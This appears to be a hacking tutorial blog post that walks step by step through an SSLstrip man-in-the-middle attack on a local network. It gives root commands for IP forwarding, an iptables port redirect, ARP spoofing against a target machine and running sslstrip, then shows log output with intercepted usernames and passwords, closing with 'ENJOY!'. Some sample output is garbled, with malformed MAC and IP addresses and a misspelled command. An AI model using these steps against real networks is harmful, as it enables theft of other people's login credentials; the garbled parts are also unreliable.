SSLstrip

Learn SSLstrip: http://linuxphilosophy.com/rtfm/sslstrip/

SSLstrip is a tool, that knows how to separate the layers on the HTTPS protocol.
In simple words, take the HTTPS, and make him HTTP for me.

Switch to ROOT user!!

[LETS STRIP THE SSL]
#1) Open terminal & type:
root@hackbook:~# echo 1 > /proc/sys/net/ipv4/ip_forward
*echo means follow any output*
root@hackbook:~# iptable -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
*In that case, as you can see, we want to redirect port 80 to 8080*
#2) Open another terminal tab & type:
root@hackbook:~# arpspoof -i wlan0 -t 192.168.1.7 -r 192.168.1.1
*The -i means interface, The -t means target, The -r means host*
You should get output like that – for example:
ff:88:de:90:a3:cb 0:f:f3e:77:99:44:aa:8a:bc 0890 :84: arp reply 192.168.50.1.1 is-at f3e:77:99:44:tt:gg:bb
ff:88:de:90:a3:cb 0:f:f3e:77:99:44:aa:8a:bc 0890 :84: arp reply 192.168.50.1.7 is-at f3e:77:99:44:tt:gg:bb

#3) Open another terminal tab & type:
root@hackbook:~# sslstrip -l 8080
*The -l means, listen to port*
You should get output like that – for example:
sslstrip 0.9 by Moxie Marlinspike running…

*Now, go to the victim’s machine, and browse to any login page, and log in with your UserName & your Password*
*After the login process, go to each of the terminal tabs, and stop the SSLstrip process by CTRL+C*

#4) Open another terminal tab & type:
root@hackbook:~# ls
*Locate the file: sslstrip.log*
root@hackbook:~# cat sslstrip.log
*You will get something like that – for example*
*Locate the credentials*
*We’ve already did that for you*

 

data=%7B%22events%22%3A%20%5B%0A%20%20%20%20%7B%22session_screen_size%22%3A%20%2
21920×1200%22%2C%22session_dua%22%3A%20%22Mozilla%2F5.0%20(Windows%20NT%206.1%3B
%20Trident%2F7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30
729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B
%20rv%3A11.0)%20like%20Gecko%22%2C%22session_platform%22%3A%20%22Wi
n32%22%2C%22tracker_type%22%3A%20%22javascript%22%2C%22tracker_version%22%3A%20%222.1.12%22%2C%22event_name%22%3A%20%22ViewEvent%22%2C%22event_timestamp_epoch%22%3A%20%221471188153070%22%2C%22event_timezone_offset%22%3A%203%2C%22user_id&22%3A%20%22156899d74561de-0e8e5dc24c0808-4c174066-232800-156899d7457cf%22%2C%22static_ads%22%3A%20%5B%0A%20%20%20%20%7B%22static_ad_editor_id%22%3A%20552%2C%22static_ad_media_id%22%3A%202169689%2C%22divName%22%3A%20%22shderaHPSection%22%7D%2C%0A%20%20%20%20%7B%22static_ad_editor_id%22%3A%20754%2C%22static_ad_media_id%22%3A%202204434%2C%22static_ad_url%22%3A%20%22%22%2C%22divName%22%3A%20%22prime-cube-hp%22%7D%2C%0A%20%20%20%20%7B%22static_ad_editor_id%22%3A%20735%2C%22static_ad_media_id%22%3A%202201932%2C%username=test&password=hackme22static_ad_url%22%3A%20%22http%3A%2F%2Ftestmobilecom%2F%3Flm_supplier%3D7295%26lm_bc%3D3362%22%2C%22divName%22%3A%20%22prime-cube-hp%22%7D%2C%0A%20%20%20%20%7B%22static_ad_editor_id%22%3A%20754%2C%22divName%22%3A%20%22ads-spaces-internet-more-item%22%7D%0A%5D%2C%22page_url%22%3A%20%22http%3A%2F%2Fwww.test.com%2F%22%2C%22page_title%22%3A%20%22%D7%95%D7%95%D7%90%D7%9C%D7%94!%20NEWS%22%2C%22tuid%22%3A%20%2236991036078107%22%2C%22current_vertical%22%3A%20%22homepage%22%2C%22adblocker_found%22%3A%20%22no%22%2C%22user_logged_in%22%3A%20%22no%22%2C%22user_name%22%3A%20%22%22%2C%22media_zone%22%3A%20%22test.homepage.prime3%22%2C%22ads_layout%22%3A%20%22v2%22%2C%22item_id%22%3A%200%2C%22category_id%22%3A%200%2C%22vertical_id%22%3A%20173%2C%22ind__view%22%3A%20%22no%22%2C%22seg_cookie%22%3A%20%22Age%253D%2526Gender%253D%2526Content%253D0%2526Video%253D0%2526Adtoma%253D0%2526MusicParameter%253D1%22%2C%22page_load_id%22%3A%20%221471188151117496%22%7D%0A%5D%7D

 

*Or something like that – for example*
*Locate the credentials*
*We’ve already did that for you*

2015-11-18 22:22:22:22, 503 SECURE POST Data (test.test.com)
w=%2F%40login.commit&souce=login&frame_login=1&theme=&returnURL=http%3A%2F%fmail.test.com%3F&deviceId=&token=&noticitation_token
=&iphone=&srv=&username=test&password=hackme
2015-11-18 22:22:22:22, 617 POST Data (192.165.54.00):

2015-11-18 22:22:22:22, 617 POST Data (192.165.54.00):

2015-11-18 22:22:22:22, 617 POST Data (192.165.54.00):
[“{\subscribe\”:[\”jtng\,\ test\”],\”Data\”:’\”http//test.com/?w=/login&error=p\\”}”]
2015-11-18 22:22:22:22, 617 POST Data (192.165.54.00):

2015-11-18 22:22:22:22, 617 POST Data (192.165.54.00):

root@hackbook:~#

 

ENJOY! 🙂

 

Here is an example by Gamer Forever